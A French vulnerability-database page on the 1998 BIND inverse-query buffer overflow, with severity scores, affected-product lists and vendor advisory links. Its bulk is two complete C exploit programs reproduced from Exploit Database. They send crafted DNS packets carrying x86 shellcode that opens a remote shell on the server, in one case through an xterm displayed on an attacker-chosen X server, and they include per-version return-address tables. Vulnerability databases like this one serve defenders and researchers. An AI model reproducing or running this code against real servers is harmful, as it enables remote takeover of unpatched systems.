Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Inverse query buffer overflow in BIND 4.9 and BIND 8 Releases.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 19111
Date de publication : 1998-04-07 22h00 +00:00
Auteur : ROTShB
EDB Vérifié : Yes
/*
source: https://www.securityfocus.com/bid/134/info
A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host.
Exploits for this vulnerability are very widespread, and were posted to the Bugtraq mailing list.
*/
/*
* have fun.
* -ROTShB
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#define DEFAULT_TARGET 0
#define DEFAULT_OPTIMIZATION 0
#define DEFAULT_ANBUF_OFFSET 300
#define DLEN_VAL 4
#define NPACKETSZ 512
#define NMAXDNAME 1025
#define PRE_EGG_DATALEN (1+(sizeof(short)*3)+sizeof(long))
#define ALEN_VAL (DLEN_VAL+PRE_EGG_DATALEN)
#define BUFFSIZE 4096
struct target_type
{
char desc[40];
int systype;
unsigned long addr;
unsigned long opt_addr;
int fd;
};
struct target_type target[] =
{
{"x86 Linux 2.0.x named 4.9.5-REL (se)",0,0xbffff21c,0xbffff23c,4},
{"x86 Linux 2.0.x named 4.9.5-REL (le)",0,0xbfffeedc,0xbfffeefc,4},
{"x86 Linux 2.0.x named 4.9.5-P1 (se)",0,0xbffff294,0xbffff2cc,4},
{"x86 Linux 2.0.x named 4.9.5-P1 (le)",0,0xbfffef8c,0xbfffefb4,4},
{"x86 Linux 2.0.x named 4.9.6-REL (se)",0,0xbffff3e3,0xbffff403,4},
{"x86 Linux 2.0.x named 4.9.6-REL (le)",0,0xbffff188,0xbffff194,4},
{"x86 Linux 2.0.x named 8.1-REL (se)",0,0xbffff6a4,0xbffff6f8,5},
{"x86 Linux 2.0.x named 8.1-REL (le)",0,0xbffff364,0xbffff3b8,5},
{"x86 Linux 2.0.x named 8.1.1 (se)",0,0xbffff6b8,0xbffff708,5},
{"x86 Linux 2.0.x named 8.1.1 (le)",0,0xbffff378,0xbffff3c8,5},
{"x86 FreeBSD 3.x named 4.9.5-REL (se)",1,0xefbfd260,0xefbfd2c8,4},
{"x86 FreeBSD 3.x named 4.9.5-REL (le)",1,0xefbfd140,0xefbfd1a8,4},
{"x86 FreeBSD 3.x named 4.9.5-P1 (se)",1,0xefbfd260,0xefbfd2c8,4},
{"x86 FreeBSD 3.x named 4.9.5-P1 (le)",1,0xefbfd140,0xefbfd1a8,4},
{"x86 FreeBSD 3.x named 4.9.6-REL (se)",1,0xefbfd480,0xefbfd4e8,4},
{"x86 FreeBSD 3.x named 4.9.6-REL (le)",1,0xefbfd218,0xefbfd274,4},
{{0},0,0,0,0}
};
unsigned long resolve(char *host)
{
long i;
struct hostent *he;
if((i=inet_addr(host))==(-1))
if((he=gethostbyname(host))==NULL)
return(0);
else
return(*(unsigned long *)he->h_addr);
return(i);
}
int send_packet(int fd, char *buff, int len)
{
char tmp[2], *ptr=tmp;
PUTSHORT(len,ptr);
if(write(fd,tmp,2)!=2)
return(-1);
if(write(fd,buff,len)!=len)
return(-1);
return(1);
}
int attack(int fd, struct target_type t, unsigned long offset, int optimized)
{
char buff[BUFFSIZE], *ptr=buff;
HEADER *dnsh=(HEADER *)buff;
unsigned long i;
int dlen, len=0;
(void)memset(dnsh,0,sizeof(HEADER));
dnsh->id = htons(31337);
dnsh->opcode = IQUERY;
dnsh->rd = 1;
dnsh->ra = 1;
dnsh->ancount = htons(1);
ptr += sizeof(HEADER);
len += sizeof(HEADER);
*ptr = '\0';
ptr++;
i = T_A;
PUTSHORT(i,ptr);
i = C_IN;
PUTSHORT(i,ptr);
i = 31337;
PUTLONG(i,ptr);
if(t.systype==0)
{
char c0de[] =
"\x31\xc0\xb0\x3f\x31\xdb\xb3\xff\x31\xc9\xcd\x80\x31\xc0\xb0\x3f\xb1"
"\x01\xcd\x80\x31\xc0\xb0\x3f\xb1\x02\xcd\x80\xeb\x24\x5e\x8d\x1e\x89"
"\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10"
"\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7"
"\xff\xff\xff/bin/sh";
if(optimized)
dlen = NPACKETSZ+(NMAXDNAME+3)+8-PRE_EGG_DATALEN;
else
dlen = NPACKETSZ+(NMAXDNAME+3)+(sizeof(int)*6)+8-PRE_EGG_DATALEN;
PUTSHORT(dlen,ptr);
len += PRE_EGG_DATALEN;
c0de[7] = t.fd;
(void)memset(ptr,0x90,(sizeof(buff)-(ptr-buff)));
i = NPACKETSZ-PRE_EGG_DATALEN-sizeof(c0de);
(void)memcpy((ptr+i),c0de,sizeof(c0de));
if(!optimized)
{
(void)memcpy((ptr+(dlen-16-sizeof(c0de))),c0de,sizeof(c0de));
i = ALEN_VAL;
(void)memcpy((ptr+(dlen-16)),&i,sizeof(i));
i = DLEN_VAL;
(void)memcpy((ptr+(dlen-12)),&i,sizeof(i));
}
else
(void)memcpy((ptr+(dlen-4-sizeof(c0de))),c0de,sizeof(c0de));
i = (optimized?t.opt_addr:t.addr)+offset;
len += dlen;
}
else if(t.systype==1)
{
char c0de[] =
"\xeb\x6e\x5e\xc6\x06\x9a\x31\xc9\x89\x4e\x01\xc6\x46\x05\x07\x88"
"\x4e\x06\x51\x31\xdb\xb3\x04\x53\x66\xc7\x46\x07\xeb\xa7\x31\xc0"
"\xb0\x5a\x50\xeb\x50\xfe\xc1\x51\x53\xc6\x46\x08\xb6\x31\xc0\xb0"
"\x5a\x50\xeb\x41\xfe\xc1\x51\x53\xc6\x46\x08\xc5\x31\xc0\xb0\x5a"
"\x50\xeb\x32\xc7\x46\x07\x2f\x62\x69\x6e\xc7\x46\x0b\x2f\x73\x68"
"\x21\x31\xc0\x88\x46\x0e\x8d\x5e\x07\x89\x5e\x0f\x89\x46\x13\x8d"
"\x5e\x13\x53\x8d\x5e\x0f\x53\x8d\x5e\x07\x53\xb0\x3b\x50\xeb\x05"
"\xe8\x8d\xff\xff\xff";
if(optimized)
dlen = NPACKETSZ+(NMAXDNAME+3)+8-PRE_EGG_DATALEN;
else
dlen = NPACKETSZ+(NMAXDNAME+3)+(sizeof(int)*6)+8-PRE_EGG_DATALEN;
PUTSHORT(dlen,ptr);
len += PRE_EGG_DATALEN;
c0de[22] = t.fd;
(void)memset(ptr,0x90,(sizeof(buff)-(ptr-buff)));
i = NPACKETSZ-PRE_EGG_DATALEN-sizeof(c0de);
(void)memcpy((ptr+i),c0de,sizeof(c0de));
if(!optimized)
{
(void)memcpy((ptr+(dlen-16-sizeof(c0de))),c0de,sizeof(c0de));
i = ALEN_VAL;
(void)memcpy((ptr+(dlen-16)),&i,sizeof(i));
i = DLEN_VAL;
(void)memcpy((ptr+(dlen-12)),&i,sizeof(i));
}
else
(void)memcpy((ptr+(dlen-4-sizeof(c0de))),c0de,sizeof(c0de));
i = (optimized?t.opt_addr:t.addr)+offset;
(void)memcpy((ptr+(dlen-4)),&i,sizeof(i));
len += dlen;
}
else
return(0);
return(send_packet(fd,buff,len));
}
int main(int argc, char *argv[])
{
char xbuf[128], ybuf[128];
unsigned long offset=DEFAULT_ANBUF_OFFSET;
int ti, opt=DEFAULT_OPTIMIZATION, sock, i;
int xlen=0, ylen=0;
fd_set rd, wr;
struct sockaddr_in sa;
for(i=0;((target[i].addr)||(target[i].opt_addr));i++);
if(argc<2)
{
(void)fprintf(stderr,"\ntarget types:\n");
for(ti=0;ti<i;ti++)
(void)fprintf(stderr," %-2d : %s\n",ti,target[ti].desc);
(void)fprintf(stderr,"\nerror: usage: %s <host> [tt] [opt] [ofst]\n",
argv[0]);
exit(-1);
}
if(argc>2)
{
ti = atoi(argv[2]);
if((ti<0)||(ti>i))
{
(void)fprintf(stderr,"error: invalid target type %d\n",ti);
exit(-1);
}
}
else
ti = DEFAULT_TARGET;
if(argc>3)
{
opt = atoi(argv[3]);
if((opt!=0)&&(opt!=1))
{
(void)fprintf(stderr,"error: invalid optimization setting %d\n",opt);
exit(-1);
}
}
if(argc>4)
offset = atoi(argv[4]);
if(!(sa.sin_addr.s_addr=resolve(argv[1])))
{
(void)fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
exit(-1);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(53);
if((sock=socket(sa.sin_family,SOCK_STREAM,0))==(-1))
{
(void)perror("error: socket");
exit(-1);
}
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))
{
(void)perror("error: connect");
exit(-1);
}
(void)printf("target : %s\n",inet_ntoa(sa.sin_addr));
(void)printf("target type : %s\n",target[ti].desc);
(void)printf("optimized named : %s\n",(opt?"YES":"NO"));
(void)printf("anbuff addr : 0x%x\n",(unsigned int)
(i=(opt?target[ti].opt_addr:target[ti].addr)));
(void)printf("anbuff addr offset : %lu\n",offset);
(void)printf("ret addr : 0x%x\n",(unsigned int)(i+offset));
(void)printf("fd to make dups of : %d\n",target[ti].fd);
(void)printf("here we go...\n");
switch(attack(sock,target[ti],offset,opt))
{
case -1:
(void)perror("error: attack");
exit(-1);
break;
case 0:
(void)fprintf(stderr,"error: internal error\n");
exit(-1);
break;
}
(void)printf("have fun.\n");
(void)printf("-ROTShB\n");
while(1)
{
FD_ZERO(&rd);
if(ylen<(sizeof(ybuf)-1))
FD_SET(sock,&rd);
if(xlen<(sizeof(xbuf)-1))
FD_SET(fileno(stdin),&rd);
FD_ZERO(&wr);
if(xlen)
FD_SET(sock,&wr);
if(ylen)
FD_SET(fileno(stdout),&wr);
if((ti=select((sock+1),&rd,&wr,NULL,NULL))==(-1))
{
(void)perror("error: select");
break;
}
if(FD_ISSET(fileno(stdin),&rd))
{
if((i=read(fileno(stdin),(xbuf+xlen),(sizeof(xbuf)-xlen)))==(-1))
{
(void)perror("error: read");
exit(-1);
}
else if(i==0)
break;
xlen += i;
if(!(--ti)) continue;
}
if(FD_ISSET(sock,&wr))
{
if(write(sock,xbuf,xlen)!=xlen)
{
(void)perror("error: write");
exit(-1);
}
xlen = 0;
if(!(--ti)) continue;
}
if(FD_ISSET(sock,&rd))
{
if((i=read(sock,(ybuf+ylen),(sizeof(ybuf)-ylen)))==(-1))
{
(void)perror("error: read");
exit(-1);
}
else if(i==0)
break;
ylen += i;
if(!(--ti)) continue;
}
if(FD_ISSET(fileno(stdout),&wr))
{
if(write(fileno(stdout),ybuf,ylen)!=ylen)
{
(void)perror("error: write");
exit(-1);
}
ylen = 0;
if(!(--ti)) continue;
}
}
if(close(sock)==(-1))
{
(void)perror("error: close");
exit(-1);
}
exit(0);
}
Exploit Database EDB-ID : 19112
Date de publication : 1998-04-07 22h00 +00:00
Auteur : prym
EDB Vérifié : Yes
/*
source: https://www.securityfocus.com/bid/134/info
A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host.
Exploits for this vulnerability are very widespread, and were posted to the Bugtraq mailing list.
*/
/*
* z, thnx.
* ganked the xterm exec from adm, thnx.
* have fun.
* -prym
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>
#define REMOTE
#define DEFAULT_ANBUF_OFFSET 300
#define DEFAULT_TARGET 0
#define DEFAULT_OPTIMIZED 0
#define DLEN_VAL 4
#define PRE_OF_DATALEN (1+(sizeof(short)*3)+sizeof(long))
#define ALEN_VAL (DLEN_VAL+PRE_OF_DATALEN)
#define EVILSPACE (PACKETSZ-PRE_OF_DATALEN)
#define RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+(sizeof(int)*6)+4-PRE_OF_DATALEN)
#define OPT_RET_FROM_1NOP (PACKETSZ+(MAXDNAME+3)+4-PRE_OF_DATALEN)
struct target_type
{
char desc[40];
int systype;
unsigned long addr;
unsigned long opt_addr;
};
struct target_type target[] =
{
{"x86 Linux 2.0.x named 4.9.5-P1",0,0xbfffef8c,0xbfffefb4},
{"x86 Linux 2.0.x named 4.9.6-REL",0,0xbffff188,0xbffff194},
{"x86 Linux 2.0.x named 8.1-REL",0,0xbffff3f0,0xbffff44c},
{"x86 Linux 2.0.x named 8.1.1",0,0xbffff404,0xbffff45c},
{"x86 Linux 2.0.x RH 4.2 named 4.9.5-P1",0,0,0xbfffeff8},
{{0},0,0,0}
};
unsigned long resolve(char *host)
{
long i;
struct hostent *he;
if((i=inet_addr(host))<0)
if((he=gethostbyname(host))==NULL)
return(0);
else
return(*(unsigned long *)he->h_addr);
return(i);
}
int send_packet(int fd, char *buff, int len)
{
char tmp[2], *ptr=tmp;
PUTSHORT(len,ptr);
if(write(fd,tmp,2)!=2)
return(-1);
if(write(fd,buff,len)!=len)
return(-1);
return(1);
}
int attack(int fd, struct in_addr us, struct target_type t,
unsigned long offset, int optimized)
{
char buff[sizeof(HEADER)+PRE_OF_DATALEN+RET_FROM_1NOP+4], *ptr=buff;
HEADER *dnsh=(HEADER *)buff;
unsigned long i;
int dlen, len=0, al=ALEN_VAL, dl=DLEN_VAL;
memset(dnsh,0,sizeof(HEADER));
dnsh->id = htons(31337);
dnsh->opcode = IQUERY;
dnsh->rd = 1;
dnsh->ra = 1;
dnsh->ancount = htons(1);
ptr += sizeof(HEADER);
len += sizeof(HEADER);
*ptr = '\0';
ptr++;
PUTSHORT(T_A,ptr);
PUTSHORT(C_IN,ptr);
PUTLONG(31337,ptr);
dlen = (optimized?OPT_RET_FROM_1NOP:RET_FROM_1NOP)+4;
PUTSHORT(dlen,ptr);
len += PRE_OF_DATALEN;
memset(ptr,'X',(sizeof(buff)-(ptr-buff)));
if(t.systype==0)
{
#ifdef REMOTE
char c1[] =
"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
"\x80\xe8\xcc\xff\xff\xff";
char c2[] =
"/usr/bin/X11/xterm\xff-display\xff";
char c3[32];
char c4[] =
"\xfe\xe8\xb1\xff\xff\xff";
snprintf(c3,sizeof(c3),"%s:0\xff-e\xff/bin/sh\xff",inet_ntoa(us));
c1[4] = (unsigned char)0x32+strlen(c2)+strlen(c3);
c4[2] = (unsigned char)0xc9-strlen(c2)-strlen(c3);
i = EVILSPACE-strlen(c1)-strlen(c2)-strlen(c3)-strlen(c4);
memset(ptr,0x90,i);
memcpy((ptr+i),c1,strlen(c1));
memcpy((ptr+i+strlen(c1)),c2,strlen(c2));
memcpy((ptr+i+strlen(c1)+strlen(c2)),c3,strlen(c3));
memcpy((ptr+i+strlen(c1)+strlen(c2)+strlen(c3)),c4,strlen(c4));
#else
char c0de[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hi";
int i = EVILSPACE-strlen(c0de);
memset(ptr,0x90,i);
memcpy((ptr+i),c0de,strlen(c0de));
#endif
}
else
return(0);
if(!optimized)
{
memcpy((ptr+(dlen-16)),&al,sizeof(al));
memcpy((ptr+(dlen-12)),&dl,sizeof(dl));
}
i = (optimized?t.opt_addr:t.addr)+offset;
memcpy((ptr+(dlen-4)),&i,sizeof(i));
len += dlen;
return(send_packet(fd,buff,len));
}
int main(int argc, char *argv[])
{
unsigned long offset=DEFAULT_ANBUF_OFFSET;
int target_index=DEFAULT_TARGET, optimized=DEFAULT_OPTIMIZED, sock, i;
struct sockaddr_in sa;
struct in_addr xs;
for(i=0;target[i].desc[0];i++);
if(argc<3)
{
fprintf(stderr,"\ntarget types:\n");
fprintf(stderr," %-2s : %-12s - %-12s - %s\n","tt","anbuf","opt anbuf",
"description");
for(target_index=0;target_index<i;target_index++)
fprintf(stderr," %-2d : 0x%-10x - 0x%-10x - %s\n",target_index,
(unsigned int)target[target_index].addr,
(unsigned int)target[target_index].opt_addr,
target[target_index].desc);
fprintf(stderr,
"\nerror: usage: %s <target> <X server> [tt] [opt] [offset]\n",
argv[0]);
exit(-1);
}
if((argc>3)&&((target_index=atoi(argv[3]))>=i))
{
fprintf(stderr,"error: invalid target type %d\n",target_index);
exit(-1);
}
if((target[target_index].addr==0)&&(target[target_index].opt_addr==0))
{
fprintf(stderr,"error: internal error\n");
exit(-1);
}
if(argc>4)
{
optimized = atoi(argv[4]);
if((optimized!=0)&&(optimized!=1))
{
fprintf(stderr,"error: invalid optimization setting %d\n",optimized);
exit(-1);
}
}
if((optimized==0)&&(target[target_index].addr==0))
optimized = 1;
if((optimized==1)&&(target[target_index].opt_addr==0))
optimized = 0;
if(argc>5)
offset = atoi(argv[5]);
if(!(xs.s_addr=resolve(argv[2])))
{
fprintf(stderr,"error: can not resolve: %s\n",argv[2]);
exit(-1);
}
if(!(sa.sin_addr.s_addr=resolve(argv[1])))
{
fprintf(stderr,"error: can not resolve: %s\n",argv[1]);
exit(-1);
}
sa.sin_family = AF_INET;
sa.sin_port = htons(53);
if((sock=socket(sa.sin_family,SOCK_STREAM,IPPROTO_TCP))==(-1))
{
perror("error: socket");
exit(-1);
}
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))==(-1))
{
perror("error: connect");
exit(-1);
}
printf("target : %s\n",inet_ntoa(sa.sin_addr));
printf("target type : %s\n",target[target_index].desc);
printf("optimized named : %s\n",(optimized?"YES":"NO"));
printf("anbuff addr : 0x%x\n",(unsigned int)
(optimized?target[target_index].opt_addr:target[target_index].addr));
printf("anbuff addr offset : %lu\n",offset);
printf("xterm display dest : %s:0\n",inet_ntoa(xs));
printf("exploiting . . .\n");
switch(attack(sock,xs,target[target_index],offset,optimized))
{
case -1:
perror("error: attack");
return(-1);
break;
case 0:
fprintf(stderr,"error: internal error\n");
return(-1);
break;
}
if(close(sock)!=0)
{
perror("error: close");
return(-1);
}
exit(0);
}
Products Mentioned
Configuraton 0
Data_general>>Dg_ux >> Version 5.4_3.0
Data_general>>Dg_ux >> Version 5.4_3.1
Data_general>>Dg_ux >> Version 5.4_4.1
Data_general>>Dg_ux >> Version 5.4_4.11
Isc>>Bind >> Version 4.9.6
- Isc>>Bind >> Version 4.9.6 (Open CPE detail)
- Isc>>Bind >> Version 4.9.6 (Open CPE detail)
Isc>>Bind >> Version 8.1
- Isc>>Bind >> Version 8.1 (Open CPE detail)
- Isc>>Bind >> Version 8.1 (Open CPE detail)
Isc>>Bind >> Version 8.1.1
- Isc>>Bind >> Version 8.1.1 (Open CPE detail)
- Isc>>Bind >> Version 8.1.1 (Open CPE detail)
Sgi>>Irix >> Version 3.2
Sgi>>Irix >> Version 3.3
Sgi>>Irix >> Version 3.3.1
Sgi>>Irix >> Version 3.3.2
Sgi>>Irix >> Version 3.3.3
Sgi>>Irix >> Version 4.0
Sgi>>Irix >> Version 4.0.1
- Sgi>>Irix >> Version 4.0.1 (Open CPE detail)
Sgi>>Irix >> Version 4.0.1t
- Sgi>>Irix >> Version 4.0.1t (Open CPE detail)
Sgi>>Irix >> Version 4.0.2
- Sgi>>Irix >> Version 4.0.2 (Open CPE detail)
Sgi>>Irix >> Version 4.0.3
- Sgi>>Irix >> Version 4.0.3 (Open CPE detail)
Sgi>>Irix >> Version 4.0.4
- Sgi>>Irix >> Version 4.0.4 (Open CPE detail)
Sgi>>Irix >> Version 4.0.4b
- Sgi>>Irix >> Version 4.0.4b (Open CPE detail)
Sgi>>Irix >> Version 4.0.4t
- Sgi>>Irix >> Version 4.0.4t (Open CPE detail)
Sgi>>Irix >> Version 4.0.5
- Sgi>>Irix >> Version 4.0.5 (Open CPE detail)
Sgi>>Irix >> Version 4.0.5_iop
- Sgi>>Irix >> Version 4.0.5_iop (Open CPE detail)
Sgi>>Irix >> Version 4.0.5_ipr
Sgi>>Irix >> Version 4.0.5a
- Sgi>>Irix >> Version 4.0.5a (Open CPE detail)
Sgi>>Irix >> Version 4.0.5d
- Sgi>>Irix >> Version 4.0.5d (Open CPE detail)
Sgi>>Irix >> Version 4.0.5e
- Sgi>>Irix >> Version 4.0.5e (Open CPE detail)
Sgi>>Irix >> Version 4.0.5f
- Sgi>>Irix >> Version 4.0.5f (Open CPE detail)
Sgi>>Irix >> Version 4.0.5g
- Sgi>>Irix >> Version 4.0.5g (Open CPE detail)
Sgi>>Irix >> Version 4.0.5h
- Sgi>>Irix >> Version 4.0.5h (Open CPE detail)
Sgi>>Irix >> Version 5.0
Sgi>>Irix >> Version 5.0.1
- Sgi>>Irix >> Version 5.0.1 (Open CPE detail)
Sgi>>Irix >> Version 5.1
- Sgi>>Irix >> Version 5.1 (Open CPE detail)
Sgi>>Irix >> Version 5.1.1
- Sgi>>Irix >> Version 5.1.1 (Open CPE detail)
Sgi>>Irix >> Version 5.2
- Sgi>>Irix >> Version 5.2 (Open CPE detail)
Sgi>>Irix >> Version 5.3
- Sgi>>Irix >> Version 5.3 (Open CPE detail)
- Sgi>>Irix >> Version 5.3 (Open CPE detail)
Sgi>>Irix >> Version 6.0
- Sgi>>Irix >> Version 6.0 (Open CPE detail)
Sgi>>Irix >> Version 6.1
- Sgi>>Irix >> Version 6.1 (Open CPE detail)
Sgi>>Irix >> Version 6.2
- Sgi>>Irix >> Version 6.2 (Open CPE detail)
Sgi>>Irix >> Version 6.3
- Sgi>>Irix >> Version 6.3 (Open CPE detail)
Configuraton 0
Bsdi>>Bsd_os >> Version 2.0
- Bsdi>>Bsd_os >> Version 2.0 (Open CPE detail)
Bsdi>>Bsd_os >> Version 2.0.1
- Bsdi>>Bsd_os >> Version 2.0.1 (Open CPE detail)
Bsdi>>Bsd_os >> Version 2.1
- Bsdi>>Bsd_os >> Version 2.1 (Open CPE detail)
Caldera>>Openlinux >> Version 1.0
Ibm>>Aix >> Version 4.1
- Ibm>>Aix >> Version 4.1 (Open CPE detail)
Ibm>>Aix >> Version 4.1.1
- Ibm>>Aix >> Version 4.1.1 (Open CPE detail)
Ibm>>Aix >> Version 4.1.2
- Ibm>>Aix >> Version 4.1.2 (Open CPE detail)
Ibm>>Aix >> Version 4.1.3
- Ibm>>Aix >> Version 4.1.3 (Open CPE detail)
Ibm>>Aix >> Version 4.1.4
- Ibm>>Aix >> Version 4.1.4 (Open CPE detail)
Ibm>>Aix >> Version 4.1.5
- Ibm>>Aix >> Version 4.1.5 (Open CPE detail)
Ibm>>Aix >> Version 4.2
- Ibm>>Aix >> Version 4.2 (Open CPE detail)
Ibm>>Aix >> Version 4.2.1
- Ibm>>Aix >> Version 4.2.1 (Open CPE detail)
Ibm>>Aix >> Version 4.3
- Ibm>>Aix >> Version 4.3 (Open CPE detail)
Nec>>Asl_ux_4800 >> Version 64
Netbsd>>Netbsd >> Version 1.0
- Netbsd>>Netbsd >> Version 1.0 (Open CPE detail)
Netbsd>>Netbsd >> Version 1.1
- Netbsd>>Netbsd >> Version 1.1 (Open CPE detail)
Netbsd>>Netbsd >> Version 1.2
- Netbsd>>Netbsd >> Version 1.2 (Open CPE detail)
Netbsd>>Netbsd >> Version 1.2.1
- Netbsd>>Netbsd >> Version 1.2.1 (Open CPE detail)
Netbsd>>Netbsd >> Version 1.3
- Netbsd>>Netbsd >> Version 1.3 (Open CPE detail)
Netbsd>>Netbsd >> Version 1.3.1
- Netbsd>>Netbsd >> Version 1.3.1 (Open CPE detail)
Redhat>>Linux >> Version 4.0
- Redhat>>Linux >> Version 4.0 (Open CPE detail)
Redhat>>Linux >> Version 4.1
- Redhat>>Linux >> Version 4.1 (Open CPE detail)
Redhat>>Linux >> Version 4.2
- Redhat>>Linux >> Version 4.2 (Open CPE detail)
Redhat>>Linux >> Version 5.0
- Redhat>>Linux >> Version 5.0 (Open CPE detail)
Sco>>Open_desktop >> Version 3.0
Sco>>Open_desktop >> Version 5.0
Sco>>Unixware >> Version 2.1
Sco>>Unixware >> Version 7.0
Sun>>Solaris >> Version 2.5
Sun>>Solaris >> Version 2.5.1
Sun>>Solaris >> Version 2.5.1
Sun>>Solaris >> Version 2.6
- Sun>>Solaris >> Version 2.6 (Open CPE detail)
- Sun>>Solaris >> Version 2.6 (Open CPE detail)
- Sun>>Solaris >> Version 2.6 (Open CPE detail)
- Sun>>Solaris >> Version 2.6 (Open CPE detail)
- Sun>>Solaris >> Version 2.6 (Open CPE detail)
Sun>>Sunos >> Version -
- Sun>>Sunos >> Version - (Open CPE detail)
Sun>>Sunos >> Version 5.3
- Sun>>Sunos >> Version 5.3 (Open CPE detail)
Sun>>Sunos >> Version 5.4
- Sun>>Sunos >> Version 5.4 (Open CPE detail)
Sun>>Sunos >> Version 5.5
- Sun>>Sunos >> Version 5.5 (Open CPE detail)
Sun>>Sunos >> Version 5.5.1
- Sun>>Sunos >> Version 5.5.1 (Open CPE detail)
Références
ftp://patches.sgi.com/support/free/security/advisories/19980603-01-PX
Tags : vendor-advisory, x_refsource_SGI
Tags : vendor-advisory, x_refsource_SGI
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9808-083
Tags : vendor-advisory, x_refsource_HP
Tags : vendor-advisory, x_refsource_HP
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/180
Tags : vendor-advisory, x_refsource_SUN
Tags : vendor-advisory, x_refsource_SUN
2025©
tesweb SA
